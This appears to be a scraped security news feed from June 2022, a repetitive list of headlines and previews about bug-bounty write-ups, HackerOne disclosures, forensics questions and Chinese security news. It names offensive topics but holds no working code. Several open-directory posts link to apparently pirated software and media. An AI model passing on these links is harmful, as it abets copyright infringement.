    Text Based Injection | Content Spoofing on ISRO Website
    No content preview
  • Open

    OAuth Misconfiguration Leads To Pre-Account Takeover
    No content preview
    IW Weekly #4: BITB Attack, Hackthebox Walkthrough, Twitter Link Takeover, and more.
    No content preview
    Text Based Injection | Content Spoofing on ISRO Website
    No content preview
  • Open

    OAuth Misconfiguration Leads To Pre-Account Takeover
    No content preview
    IW Weekly #4: BITB Attack, Hackthebox Walkthrough, Twitter Link Takeover, and more.
    No content preview
    Text Based Injection | Content Spoofing on ISRO Website
    No content preview
  • Open

    【安全通报】Apache Shiro权限绕过漏洞(CVE-2022-32532)
    Apache Shiro 1.9.1前的版本RegExPatternMatcher在使用带有“.”的正则时,可能会导致权限绕过。漏洞源于RegExPatternMatcher默认使用的正则匹配的“.”不会匹配换行...
  • Open

    【安全通报】Apache Shiro权限绕过漏洞(CVE-2022-32532)
    Apache Shiro 1.9.1前的版本RegExPatternMatcher在使用带有“.”的正则时,可能会导致权限绕过。漏洞源于RegExPatternMatcher默认使用的正则匹配的“.”不会匹配换行...
  • Open

    SecWiki News 2022-06-29 Review
    Advanced Windows TaskScheduler Playbook by ourren 在软件缺陷预测中使用软件可视化和迁移学习 by ourren 构建模块化调用图以实现NodeJS应用的安全扫描 by ourren 卫星安全从入门到进门 by ourren 浅谈企业安全建设“道”与“术”--道篇 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-29 Review
    Advanced Windows TaskScheduler Playbook by ourren 在软件缺陷预测中使用软件可视化和迁移学习 by ourren 构建模块化调用图以实现NodeJS应用的安全扫描 by ourren 卫星安全从入门到进门 by ourren 浅谈企业安全建设“道”与“术”--道篇 by ourren 更多最新文章,请访问SecWiki
  • Open

    read-only ethernet cable
    Hello, I'd like to make a read-only ethernet cable to sniff traffic to send it to snort. I found a lot of links on the web but some has lack of information other are to complex. I found this but it seems to me that it speak about a read-only one-way cable. Obviously I need a twa-way cable. Can you help me to find a simple how to ? thanks submitted by /u/SkyTeeth [link] [comments]
  • Open

    Big ol' pile of movies
    [ Removed by reddit in response to a copyright notice. ] submitted by /u/neofaust [link] [comments]
    Mamont's open FTP Index / Page 22 of 49
    submitted by /u/thiskeepsmeupatnight [link] [comments]
  • Open

    Active Directory Penetration Testing Sample Report
    There are bunch of web app pentest reports can be found on https://pentestreports.com/reports/ However, I did not see any report for Active Directory Penetration Testing Sample. If you happen to know, please share it here. Thanks submitted by /u/w0lfcat [link] [comments]
  • Open

    XSS Payload on TikTok Seller Center endpoint
    TikTok disclosed a bug submitted by aidilarf_2000: https://hackerone.com/reports/1554048 - Bounty: $1000

  • Open

    FabricScape: Escaping Service Fabric and Taking Over the Cluster
    FabricScape (CVE-2022-30137) is a privilege escalation vulnerability of important severity in Microsoft's Service Fabric, commonly used with Azure. The post FabricScape: Escaping Service Fabric and Taking Over the Cluster appeared first on Unit 42.
  • Open

    Abusing Cloudflare Workers
    submitted by /u/thorn42 [link] [comments]
    Zimbra unauthenticated RCE via unrar path traversal (CVE-2022-30333)
    submitted by /u/monoimpact [link] [comments]
    Hive Ransomware Decrypter Tool - KISA
    submitted by /u/CyberMasterV [link] [comments]
    CVE-2022-30522 - Apache httpd "mod_sed" DoS vulnerability
    submitted by /u/SRMish3 [link] [comments]
    Intune hacking: when is a "wipe" not a wipe
    submitted by /u/nopslider [link] [comments]
  • Open

    Forensic Tools for Browser Data
    Does anyone recommend any tool for extracting browser data? I am using Foxton Browser Examiner Trial, which is great. But are there any suggestions for other software similar to this? The data is partially damaged as it was deleted and then recovered. Any suggestions would be appreciated. The data is sitting in a folder rather than an installed OS. submitted by /u/niveapeachshine [link] [comments]
    Paladin Not Detecting Source Drive
    Hello Folks, I am using a Paladin USB (Version 8.x.x) on a Dell Latitude to take an image of the hard drive. Paladin is not appearing to detect the hard drive of the device, only the USB drive and my external SSD I'm using as the image destination. Secure boot is off. I tried poking around in the BIOS and disabled the UEFI Boot Path Security, but that didn't work. Has anyone come across this issue before? The only other BIOS setting I can see is that RAID is also enabled. Any tips would be appreciated. If all else fails I will just remove the hard drive and image with a write blocker so all hope is not lost yet. submitted by /u/scottrich5 [link] [comments]
    BitLocker and Unallocated Space
    I'm trying to carve for files from a system that was BitLocker encrypted. However, the free space still appears to be encrypted. Is this what everyone else typically sees? I did some testing on a VM where I enabled BitLocker, took a image and decrypted it using the recovery key and the free space appears to be still encrypted as well. submitted by /u/Mufassa810 [link] [comments]
  • Open

    ByPass — LSA Protect (RunAsPPL)
    O RunAsPPL é popularmente conhecido e aplicado durante um processo de hardening até mesmo pela facilidade de aplicar a proteção, mas… Continue reading on 100security »
    Protocols and Servers 2 | TryHackMe (THM)
    Lab Access: https://tryhackme.com/room/protocolsandservers2 Continue reading on Medium »
    Hacker Search Engines
    A list of search engines useful during Penetration testing, vulnerability assessments, red team operations, bug bounty and more Continue reading on Medium »
    The Phantom Credentials of SCCM: Why the NAA Won’t Die
    TL;DR — Stop Using Network Access Accounts! Continue reading on Posts By SpecterOps Team Members »
  • Open

    Massive Trove of Gun Owners’ Private Information Leaked by California Attorney General
    submitted by /u/Hotdogpizzathehut [link] [comments]
    Microsoft Sentinel Automation Tips & Tricks – Part 1: Automation rules
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    HTML and Hyperlink Injection via Share Option In Microsoft Onenote Application
    Hyperlink Injection it’s when attacker injecting a malicious link when sending an email invitation. Continue reading on InfoSec Write-ups »
    Livepeer (Non Smart Contract) Security Disclosure Program
    Program Overview Continue reading on Livepeer Blog »
    How I Earned $200 in 5 Minutes | Open Redirection
    Hello Researchers, Continue reading on Medium »
    OpenSSH CVE-2018–15473 User Enumeration Vulnerability
    Description: Continue reading on Medium »
    XSS cheatsheet payloads
    XSS PAYLOADS Continue reading on Medium »
    Hacker Search Engines
    A list of search engines useful during Penetration testing, vulnerability assessments, red team operations, bug bounty and more Continue reading on Medium »
    Step 11: Attacking Web Applications with Ffuf
    As of starting this one, it’s Monday 27th June and my second to last day in work. Continue reading on Medium »
    Giveaway #2: The Ultimate Guide to Hunt Account Takeover(2022)
    INTRODUCTION Continue reading on Medium »
    Access control worth $2000 (everyone missed this IDOR+Access control between two admins.)
    Tribute to Binit Ghimire Continue reading on Pentester Nepal »
    BugBounty Writeup: XSS, JWT none attack, Improper Error Handling
    Hackers around the world hunt bugs and, in some cases, earn full-time incomes. Continue reading on Medium »
  • Open

    STUFF
    AMC CC 2021 v17 AMC CC 2022 v26 AMC CC 2022 v31 AutoD 3ds SketchU 2017 http://in2017.iptime.org/Util/Graphic/ submitted by /u/rwolfman3000 [link] [comments]
    I found a good OD... Here you will find AutoDesk, graphics, network And programming Courses. Oh, And Fifa 22!
    http://dl.jb-team.com/ submitted by /u/yahya007 [link] [comments]
  • Open

    Nmap timing, tips and tricks?
    I cant be the only one, and i have messed around with settings but im hoping someone can chime in with a better or best way to do this. So scanning a class C internal. and i get a ton of this, i want to not wait 15 hours for a class C to port map but i dont want to sacrifice accuracy either. This just using nmap -vv -sC -sV 192.x.x.x/24 -Pn RTTVAR has grown to over 2.3 seconds, decreasing to 2.0 adjust_timeouts2: packet supposedly had rtt of 9384712 microseconds. Ignoring time. Thanks in advance submitted by /u/networkalchemy [link] [comments]
    AlienVault OSSIM and ansible automation
    I have an AlienVault OSSIM environment where I routinely create/rebuild monitored VMs using Ansible. The usual steps to add a system to AlienVault are: Install agent on target Log into AV server via SSH Enter "Jailbreak" Register target IP using manage-agent Extract generated key and copy to target Configure key on target agent I want to automate these steps using Ansible as it's a pain to do all the above manually. Is anyone aware of any existing work in this area? submitted by /u/geggleau [link] [comments]
    I need advice from people who have gone through a similar situation
    hey everyone, I'm a beginner in pentesting and I decided to learn it after 3 years of university as a specialist in network security. But honestly, after 3 years I didn't learn anything about pentesting (only math, cisco and humanitarian subjects). Now it seems to me like I lost my time and whenever I can't solve tasks in pentesting I feel myself very very bad because I have to know all of this. I blame myself for how stupid I am because everyone in my surroundings is good at pentesting and they're winning in CTF. I really love pentesting but I don't feel confident, it seems to me that neither society nor my future employer needs me, because in a year I'm already graduating from the university and I don't know anything. Thank you for listening if you have overcome a similar situation please share ^^ ​ UPD: thanks to those who replied, it means a lot to a teenager who often forgets to just keep going. thank you for your support *hugs to everyone* submitted by /u/_hanabi_n [link] [comments]
  • Open

    HACK THE BOX: Easy Phish
    Challenge lab: Osint Continue reading on Medium »
    War in Ukraine / June 27
    One of the bloodiest wars of the XXI century Continue reading on Medium »
    Week 7: Exciting
    Hello Everyone, Continue reading on Medium »
  • Open

    SecWiki News 2022-06-28 Review
    检测引擎对熵值的敏感如何影响壳的设计 by Avenger 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-28 Review
    检测引擎对熵值的敏感如何影响壳的设计 by Avenger 更多最新文章,请访问SecWiki
  • Open

    直播倒计时十天 !CIS大会夏日版全议程公布
    “安全生长,重启一夏”,「CIS大会 夏日版·Summer live」即将精彩来袭!
    FreeBuf早报 | Killnet攻击立陶宛政府网站;网络攻击使伊朗钢铁公司被迫停产
    Killnet攻击立陶宛政府网站。
    伊朗最大的钢铁生产商遭遇网络攻击
    Ebrahimi称公司网站将很快恢复并重新上线。至于公司停止运营的原因,是网络攻击发生时,工厂刚好停电而无法继续生产。
    《互联网用户账号信息管理规定》发布,8月1日施行
    6月27日,国家网信办发布《互联网用户账号信息管理规定》,自2022年8月1日起施行。
    冒充BBVA银行2FA应用程序,Android恶意软件“Revive”的深度伪装
    一款名为“Revive”的新型安卓银行恶意软件被发现。
  • Open

    Make a Self-Replicating Virus in Python
    No content preview
    Learning More about File Upload Vulnerabilities
    The vulnerability associated with file uploads is well-known and considered to be of high severity. This vulnerability exists because the… Continue reading on InfoSec Write-ups »
  • Open

    Make a Self-Replicating Virus in Python
    No content preview
    Learning More about File Upload Vulnerabilities
    The vulnerability associated with file uploads is well-known and considered to be of high severity. This vulnerability exists because the… Continue reading on InfoSec Write-ups »
  • Open

    Make a Self-Replicating Virus in Python
    No content preview
    Learning More about File Upload Vulnerabilities
    The vulnerability associated with file uploads is well-known and considered to be of high severity. This vulnerability exists because the… Continue reading on InfoSec Write-ups »

  • Open

    Microsoft Hall Of Fame for a Small Misconfiguration.
    Hey everyone! I’m Aman, in this write-up I am going to show how you can find rate limit bug and my journey to the Microsoft Hall of Fame Continue reading on Medium »
    The Modern-Day Android Application Pentesting Approach for BugBounties/Assessments
    Understand the Attacker’s Approach and Mindset behind Pentesting Modern-Day Android Applications :D Continue reading on Medium »
    ITS TIME TO TAKEOVER ACCOUNT
    HOW I WAS ABEL TO TAKEOVER ANY USER ACCOUNT USING INVITE FUNCTION Continue reading on Medium »
    MUST HAVE : Skill for Cyber Security Engineer
    Are you the one who has passion in Cyber Security engineer ? Lets talk the business, meant i will share the must-have skill you need to… Continue reading on Medium »
    MUST KNOW : Popular operating systems in Cyber Security
    Every aspect in our life has been fullfilled by digital devices, as we can buy everything, reserve the table for two, or pay the bills in… Continue reading on Medium »
    My Pentest Log -22 — (Account Takeover Via Sinf file)
    Greetings to all from Porta Petrion, Continue reading on Medium »
    PocketPay Mobile Application Bug Bounty Campaign
    PocketPay apps are being launched on Android and iOS app stores. It’s time for the community to evolve and make things right; yes, it’s a… Continue reading on PocketPay »
    HackerOne — Getting Started
    So HackerOne was one of my favorite places to practice. I stopped completing the challenges so the invites could be used at a later time… Continue reading on Medium »
    Cyber Security adalah suatu aktivitas yang dilakukan dengan tujuan untuk mengamankan serta mencegah…
    Dengan banyaknya kejadian cyber crime di seluruh dunia, ada baiknya kita harus menghasilkan dan mengumpulkan orang orang yang mahir dalam… Continue reading on Medium »
    INERY BLOCKCHAIN INCENTIVIZED TESTNET WHITELIST
    Inery is the first-ever decentralized database management and blockchain solution $INR Continue reading on Medium »
    Intigriti’s June XSS challenge — Reflected XSS Write-up
    Preface Continue reading on Medium »
  • Open

    Velociraptor
    Hello. I am trying to test out Velociraptor but I'm having issues creating a "client.config.yaml" file to be used for my Windows agent installation. Has anyone been able to successfully deploy the agent in their environment on Windows, Linux and Mac OS? Also what are you using for the "Server" a physically box or a VM? submitted by /u/antmar9041 [link] [comments]
    Open source tools and DFIR Tryhackme equivalents
    I love learning about Pentesting and DFIR, but something I've noticed is that hacking has way more open source options and better learning material. Pentesting has so many amazing cheap hands-on learning resources, DFIR on the other hand has none that I know of. DFIR seems like the only way forward is to learn SANS ($$$). Don't get me wrong, I know things like the Sleuth Toolkit exists. I just don't know where to get hands-on experience with it in a learning environment. submitted by /u/MLGShyGuy [link] [comments]
    Browser Add-on to screenshot a whole page.
    I watched this video: https://youtu.be/gue5MofILxY?t=2354 and Cody Kinsey mentions a browser add-on that can continually scroll to the bottom of someone's social media feed or website and screenshot all the way down. Later this tool stitches these together as a pdf to keep a record of their page. Is anyone familiar with a tool or browser add-on capable of this? The tools I've found are either not free or don't work. submitted by /u/MLGShyGuy [link] [comments]
  • Open

    CVE-2022-32208: FTP-KRB bad message verification
    Internet Bug Bounty disclosed a bug submitted by nyymi: https://hackerone.com/reports/1614332 - Bounty: $480
    CVE-2022-32206: HTTP compression denial of service
    Internet Bug Bounty disclosed a bug submitted by nyymi: https://hackerone.com/reports/1614330 - Bounty: $2400
    CVE-2022-32205: Set-Cookie denial of service
    Internet Bug Bounty disclosed a bug submitted by nyymi: https://hackerone.com/reports/1614328 - Bounty: $480
    CVE-2022-32207: Unpreserved file permissions
    Internet Bug Bounty disclosed a bug submitted by nyymi: https://hackerone.com/reports/1614331 - Bounty: $2400
    Unauthorized Access to Internal Server Panel without Authentication
    U.S. Dept Of Defense disclosed a bug submitted by ahmd_halabi: https://hackerone.com/reports/1548067
    Reflected XSS via `` parameter
    U.S. Dept Of Defense disclosed a bug submitted by mdakh404: https://hackerone.com/reports/1536215
    HTTP request smuggling with Origin Rules using newlines in the host_header action parameter
    Cloudflare Public Bug Bounty disclosed a bug submitted by albertspedersen: https://hackerone.com/reports/1575912 - Bounty: $3100
    Bypassing Cache Deception Armor using .avif extension file
    Cloudflare Public Bug Bounty disclosed a bug submitted by bombon: https://hackerone.com/reports/1391635 - Bounty: $500
    Sign in with Apple generates long-life JWTs, seemingly irrevocable, that grant immediate access to accounts
    Cloudflare Public Bug Bounty disclosed a bug submitted by mattipv4: https://hackerone.com/reports/1593413 - Bounty: $250
    Sign in with Apple works on existing accounts, bypasses 2FA
    Cloudflare Public Bug Bounty disclosed a bug submitted by mattipv4: https://hackerone.com/reports/1593404 - Bounty: $1000
    API docs expose an active token for the sample domain theburritobot.com
    Cloudflare Public Bug Bounty disclosed a bug submitted by sainaen: https://hackerone.com/reports/1507412 - Bounty: $500
    Rails::Html::SafeListSanitizer vulnerable to xss attack in an environment that allows the style tag
    Internet Bug Bounty disclosed a bug submitted by windshock: https://hackerone.com/reports/1599573 - Bounty: $2400
    CVE-2022-32205: Set-Cookie denial of service
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1569946
    CVE-2022-32206: HTTP compression denial of service
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1570651
    CVE-2022-32207: Unpreserved file permissions
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1573634
    CVE-2022-32208: FTP-KRB bad message verification
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1590071
    Credential leak when use two url
    curl disclosed a bug submitted by chen172: https://hackerone.com/reports/1569926
  • Open

    How does a threat Intel company business model work?
    I was wondering how do companies that specialize in providing threat Intel generate revenue? Do they provide Intel feeds on a subscription based model to customer companies, or are they usually selling B2B to vendors such as fire wall companies? Thank you submitted by /u/DoubleAgent10 [link] [comments]
    Sending an email
    I have a question about SMTP servers. I learned that when sending mail, the sender's SMTP server forwards the mail to the recipient's SMTP server. When I heard that the SMTP server on the recipient's side forwards the mail to the POP/IMAP server for the recipient to receive, I thought why not just receive the mail directly from the SMTP server? submitted by /u/Awkward_String139 [link] [comments]
    Awesome Hacker Search Engines
    Hi everybody. Just published a repo containing search engines and online services useful for pentesting, general security, red team, bug bounty etc.. This is the link: https://github.com/edoardottt/awesome-hacker-search-engines submitted by /u/edoardottt [link] [comments]
    Is ELK as an integrated security solution any good?
    I am pretty impressed by the amount of integrations one can enable on an ELK stack. Basically, it can provide SIEM capabilities, EDR functions through osquery modules, dashboarding for every situation, network topology mapping and so much more. Moreover, it does cut the total spending quite a lot, especially when compared to other specialized solutions like Splunk and similar. I have 3 main questions: Is anyone successfully using it? Pros/cons to ad hoc solutions? How much maintenance/development does it require to keep running all the pieces together? Thank you in advance. submitted by /u/gatheringchaos [link] [comments]
  • Open

    IW Weekly #3: SQL Injection, Data Exfiltration, Log Poisoning, Blind XSS, and more.
    No content preview
    Analyzing CVE-2022–22980 to discover a real exploitable path in the source code review process with…
    No content preview
    How i was able to takeover 3 Subdomains of an Organization via Shopify?
    No content preview
    Getting Your First Bug (Part II)
    No content preview
  • Open

    IW Weekly #3: SQL Injection, Data Exfiltration, Log Poisoning, Blind XSS, and more.
    No content preview
    Analyzing CVE-2022–22980 to discover a real exploitable path in the source code review process with…
    No content preview
    How i was able to takeover 3 Subdomains of an Organization via Shopify?
    No content preview
    Getting Your First Bug (Part II)
    No content preview
  • Open

    IW Weekly #3: SQL Injection, Data Exfiltration, Log Poisoning, Blind XSS, and more.
    No content preview
    Analyzing CVE-2022–22980 to discover a real exploitable path in the source code review process with…
    No content preview
    How i was able to takeover 3 Subdomains of an Organization via Shopify?
    No content preview
    Getting Your First Bug (Part II)
    No content preview
  • Open

    War in Ukraine / June 24–26
    Russia is actively shelling Ukraine Continue reading on Medium »
    OSINT CTFs
    OSINT CTFs (Capture The Flag games) let you hone your skills through problem-solving games. I especially like those that educate you… Continue reading on Medium »
    Profil3r Tool — OSINT Tool
    Profil3r Tool Continue reading on Medium »
    How do I destroy malware and identify the author — Malware Analysis
    Hello Hackers, I’m MrEmpy and welcome. Today I will tell a story of how I found the author of malware. Continue reading on Medium »
  • Open

    SecWiki News 2022-06-27 Review
    商业银行攻防检测体系建设思考 by ourren SecWiki周刊(第434期) by ourren 信息系统供应链安全管理入门 by ourren 开源卫星地面站OpenATS by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-27 Review
    商业银行攻防检测体系建设思考 by ourren SecWiki周刊(第434期) by ourren 信息系统供应链安全管理入门 by ourren 开源卫星地面站OpenATS by ourren 更多最新文章,请访问SecWiki
  • Open

    Offensive Security: Getting Your Foothold In The Industry
    It’s been about a month since I published my last article discussing my OSCP journey and how I passed it. I am truly grateful for the… Continue reading on Medium »
    Kerberoasting Attacks and Detections
    Basic Overview Continue reading on Medium »
    A Plan for OSCP
    Hey, everyone welcome to my OSCP journey. Continue reading on Medium »
    HackerOne — Getting Started
    So HackerOne was one of my favorite places to practice. I stopped completing the challenges so the invites could be used at a later time… Continue reading on Medium »
  • Open

    PortSwigginar - 22 June
    Thank you to those who attended our recent PortSwigginar on Burp Suite Enterprise Edition. Below is the video of the session, which included: A recap on "what's new" within the product for those who h
  • Open

    PortSwigginar - 22 June
    Thank you to those who attended our recent PortSwigginar on Burp Suite Enterprise Edition. Below is the video of the session, which included: A recap on "what's new" within the product for those who h
  • Open

    Revive: from spyware to Android banking trojan | Cleafy Labs
    submitted by /u/f3d_0x0 [link] [comments]
    VaultBoot: remote attestation
    submitted by /u/hardenedvault [link] [comments]
    Notes on OpenSSL remote memory corruption
    submitted by /u/Gallus [link] [comments]
  • Open

    Awesome Hacker Search Engines
    Hi everybody. Just published a repo containing search engines and online services useful for pentesting, general security, red team, bug bounty etc.. This is the link: https://github.com/edoardottt/awesome-hacker-search-engines submitted by /u/edoardottt [link] [comments]
  • Open

    FreeBuf早报 | 腾讯 QQ 回应大批账号被盗;黑客仍在利用Log4Shell漏洞
    腾讯QQ官方回应称,主要原因系用户扫描过不法分子伪造的游戏登录二维码并授权登录,被黑产团伙劫持并记录,随后被不法分子利用发送不良图片广告。
    《个人信息跨境处理活动安全认证规范》发布,规范个人信息跨境活动
    《认证规范》从基本原则、个人信息处理者和境外接收方在跨境处理活动中应遵循的要求、个人信息主体权益保障等方面提出了要求。
    《中华人民共和国反电信网络诈骗法(草案二次审议稿)》发布
    《反电信网络诈骗法》共七章四十六条,将有利于进一步预防、遏制和惩治电信网络诈骗活动,加强反电信网络诈骗工作。
    俄罗斯对谷歌传播诋毁其军队的 “不可靠”信息进行罚款
    俄罗斯电信监管机构 Roskomnadzor 已对谷歌处以 6800 万卢布(约合120万美元)的罚款。
    QQ大规模盗号,给好友群发不雅照,腾讯回应来了
    QQ被盗后,会自动加入各种垃圾群,同时会自动向好友和群里发送垃圾、色情、赌博信息和链接。
    德克萨斯州天然气厂爆炸,俄威胁行为者或将是幕后黑手
    近期,德克萨斯州一家液化天然气厂爆炸,经调查,事件起因可能是由网络攻击引起的,而俄罗斯威胁行为者或将是事件幕后黑手。爆炸发生在德克萨斯州昆塔纳岛的自由港液化天然气(Freeport LNG)液化厂,此次事故将对自由港液化天然气的运营产生持久的影响。经初步调查表明,该事件是由于LNG输送管道的一段超压和破裂,导致液化天然气快速闪蒸和天然气蒸汽云释放和点燃。目前尚不清楚为什么该企业的安全机制不能阻止爆
  • Open

    Pretty good archive of TV, with differing quality types, it's seems to have some dubbed
    submitted by /u/hannibalateam [link] [comments]
    Huge directory of music videos
    submitted by /u/ilikemacsalot [link] [comments]

  • Open

    linx - Reveals invisible links within JavaScript files
    submitted by /u/rjz4 [link] [comments]
  • Open

    Detecting Linux Anti-Forensics Log Tampering
    submitted by /u/lugh [link] [comments]
    What is the modern, unofficial digital forensics process model that sees the most real-world application to investigations?
    To my understanding and research thus far which may be incorrect, I have gathered that there is still no official model to follow for digital forensic investigations. However, there are a number of proposed models such as: First proposed methodology from Politt outlines: Acquisition>Identification>Evaluation>Admission. DFRWS investigative model outlines: Identification>Preservation>Collection>Examination>Analysis>Presentation. Abstract digital forensics model (ADFM) outlines: Identification>Preparation>Approach Strategy>Preservation>Collection>Examination>Analysis>Presentation>Returning Evidence. Integrated digital investigation process (IDIP) outlines: Readiness Phase>Deployment Phase>Physical Crime Scene Investigation Phases/Digital Crime Scene Investigation Phases>Review Phase. Etc... That said, is there a proposed model that is used more commonly in modern investigations than others to the point in which it can almost be considered the unofficial standard? Or is it truly "pick what's most applicable to this specific investigation"? Thank you. submitted by /u/ringzero_ [link] [comments]
  • Open

    Intigriti’s May XSS challenge By PiyushThePal
    How far can you take prototype pollution? This challenge is a great showcase which uses an unpatched jQuery plugin to exploit and bypass… Continue reading on Medium »
  • Open

    Bypassing Cloudflare WAF with Host header manipulation
    Hey Folks! Thanks for your responses on my last blog. Let’s learn something new today as it is going to be damn interesting one. Continue reading on Medium »
    OS atau Operating System merupakan unsur yang sangat penting di dalam device yang kita genggam saat…
    Linux, sebagai seorang Cyber Security Engineer kita harus mengenal betul apa itu linux dan bagaimana cara menggunakannya. Pada dasarnya… Continue reading on Medium »
    MSA Weekly 1 — “5 Operating System Untuk Cyber Security”
    Ethical Hacking merupakan suatu kegiatan mengidentifikasi kelemahan dalam sistem komputer ataupun jaringan computer serta dapat… Continue reading on Medium »
    MSA Weekly 1 — “Skill yang harus dimiliki seorang cyber security engineer”
    Nah kita udah belajar mengenai sistem operasi yang biasa dipakai di cyber security, sekarang kita belajar beberapa skill yang harus… Continue reading on Medium »
    MSA Weekly 1 — “5 OS Cyber Security, kamu harus tau!”
    Dimasa digital saat ini, kita tentu tidak asing dengan istilah keamanan siber atau cyber security. dikutip dari Cisco, cyber security… Continue reading on Medium »
    How to find bugs : ULTIMATE TIPS
    There is consistently one more bug to fix. On the off chance that we don’t fix 100% of the bugs in our site, the site will be totally… Continue reading on Medium »
    How to find 1st bug for beginner bounty hunters (from personal experience)
    For people starting the bug bounty journey… Continue reading on Medium »
    MSA Weekly 1 - “Skill yang harus dimiliki Cyber Security Engineer”
    Dengan memasuki era informasi di mana komunikasi dan perdagangan melalu internet menjadi fokus utama bagi bisnis, konsumen, pemerintah dan… Continue reading on Medium »
    MAGNETY TESTNET QUICK GUIDE
    Magnety is The first DeFi Social Wallet Continue reading on Medium »
    My Reason for Writing on Medium as a Bug Bounty Hunter
    I’m a hacker who likes to write. Continue reading on Medium »
  • Open

    User can link non-public file attachments, leading to file disclose on edit by higher-privileged user
    Phabricator disclosed a bug submitted by foobar7: https://hackerone.com/reports/763177 - Bounty: $500
  • Open

    How did I design and build a complex AD set
    Hi Folks, today I would like to share how did I design and build a vulnerable AD set. Before moving to this topic, let me introduce the… Continue reading on Medium »
    Red Team vs Blue Team
    As I study for my Security+ exam, I covered the topic of the Read Team and Blue Team. In the world of cybersecurity, these groups work… Continue reading on Medium »
    Walkthrough of My Vulnerable AD Set
    Hi guys, in previous days I designed and built a difficult and complex vulnerable AD set, I planned to post the guide to reproduce it… Continue reading on Medium »
  • Open

    Decrypting TLS In Wireshark For Homegrown Application
    Hello Everyone! I posted about this in /r/networking yesterday (link below for background), made some progress there, but hoping I can get a little further here. We have an in-house application we've written for our client for network communication over the internet between us and them. Almost everything is working well except for some errors inside the TLS stream they've asked me to debug. My company created the certificates in Windows Server 2019 by installing the "Certificate Authority" role. I have the password used to create the cert. So in theory I should have access to everything I need to decrypt the TLS sections of the packet capture, but this is the first time I've done this and I'm not having any luck. I have the .pfx files and I used openssl.exe to export the private key and openssl didn't report any errors in that process. I tried that private key in Wireshark but it didn't decrypt the TLS stream. So I tried converting that to a plain-text unencrypted private key file with openssl.exe and load that into Wireshark, still didn't decrypt the TLS stream. I've tried every combination I think think of in Wireshark. In Protocols>TLS I've tried the options "RSA Keys List", "TLS Debug File", Pre-Shared Key", and "(Pre)-Master-Secret log filename". There is also a general "RSA Keys" section in the main Preferences window and I loaded the keys there as well, no luck. The "Application Data" packets still show up with the encrypted data. I also made sure the private key file name matched the "commonName" field of the certificate exchange packet in the capture. I'm unsure how to proceed from here. What am I missing? What else can I try? https://old.reddit.com/r/networking/comments/vkrz4g/decrypting_tls_in_wireshark_for_homegrown/? submitted by /u/LearningSysAdmin987 [link] [comments]
  • Open

    SecWiki News 2022-06-26 Review
    QingTing: 安全工具编排平台 by ourren 美国爱因斯坦计划跟踪与解读(2022v1版) by ourren 基于持续学习方法的命名实体识别 by ourren 太空网络安全风险及攻防演练 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-26 Review
    QingTing: 安全工具编排平台 by ourren 美国爱因斯坦计划跟踪与解读(2022v1版) by ourren 基于持续学习方法的命名实体识别 by ourren 太空网络安全风险及攻防演练 by ourren 更多最新文章,请访问SecWiki
  • Open

    Video analysis of police brutality against abortion rights activists.
    In a ruling that was as groundbreaking as it was controversial, six of the nine high courts overturned federal abortion law on Friday… Continue reading on Medium »
    SPY NEWS: 2022 — Week 25
    Summary of the espionage-related news stories for the Week 25 (19–25 June) of 2022. Continue reading on Medium »
  • Open

    [Cullinan #39] SRI and File Inclusion
    Cullinan 로그 #39입니다. SRI(Subresource Integrity)와 File Inclusion(LFI/RFI)에 대한 내용이 추가되었습니다. 그리고 수정 사항으론 Prototype Pollution에서 ZAP PassiveScan Script를 추가했고 XSS와 Path traversal 내 여러가지 항목들을 개선했습니다 😊 New SRI(Subresource Integrity File Inclusion / LFI, RFI Update Cullinan > Prototype Pollution > ZAP Scripting Cullinan > XSS > Bypass > JSFuck Cullinan > XSS > Bypass > JSFuck Hangul Cullinan > XSS > Bypass > JSFuck 8 Cullinan > XSS > Bypass > With Strtoupper Cullinan > XSS > Bypass > Data URI XSS Cullinan > XSS > Exploit > Find DOM Objects Cullinan > XSS > Exploit > Set Cookie Cullinan > Path Traversal > Exploit > API Path Tampering Cullinan > Path Traversal > Exploit > Relative Path Overwrite
  • Open

    Great Open Source Vulnerability Scanner on GitHub
    Article URL: https://github.com/mageni/mageni Comments URL: https://news.ycombinator.com/item?id=31882071 Points: 1 # Comments: 0

  • Open

    Jump starting an investigation ( school assignment)
    So I was given a flash drive to analyze and the files are of a .001, .002, .003, etc... It's been a while since I've done such an assignment, due to many General Ed and such classes since my last Forensics class. Any help on how I can proceed from this? I tried Encase and it only gives me the .001 file to load, but i proceed to do that and nothing happens. Any help would be greatly appreciated. submitted by /u/DeviantWolfe [link] [comments]
    What do you think about this workstation I built.
    submitted by /u/L4Z3R_H4WK [link] [comments]
  • Open

    Basic WebAssembly buffer overflow exploitation
    submitted by /u/chaplja [link] [comments]
  • Open

    统一身份管理方案:从解析到落地实录
    统一身份管理方案对于业内日趋严格的标准化工作的推进,还是有点参考意义的。
  • Open

    Which resume is best? one i created with canva or the one i created with word?
    word : https://drive.google.com/file/d/12x7-ENfdy9NI1nWpELRQCWCprJb4_FQG/view?usp=sharing canva : https://drive.google.com/file/d/1H-E8cOfq3sKC6onlJY2ZxN5nkQ7-mRni/view?usp=sharing submitted by /u/Appropriate_Text1996 [link] [comments]
    Aiming for SOC analyst positions, overhauled my resume, how's it look?
    Taking Security+ in 3 weeks (been studying for the past few months). My goal is become a SOC analyst as I really like working with technical data. My background is in gov / DOD intel and I previously applied to a bunch of entry level cyber jobs but got like 1 response so I completely redid my resume and tried to make the skills as relatable to netsec as possible. After I have Sec+ I'm planning to get my hands on an open source SIEM and get familiar with it at home. Possibly also going to study for CySA+ too while I apply for jobs. How does my resume look (as someone trying to transition into network security)? Any other ways / things I can do to make myself standout (again specifically going for SOC analyst)? And what's missing (beyond the obvious like experience with specific tools, SIEMs, IDS, IPS, firewalls, etc.)? Greatly appreciate any input / suggestions as I've been attempting to get into network security for a while now! https://imgur.com/a/3tPLmF3 submitted by /u/Anontrovert [link] [comments]
    How to set up a laptop as a dedicated mal-lab that has access to my home network for malware to send and receive traffic but cannot propagate to the rest of my devices?
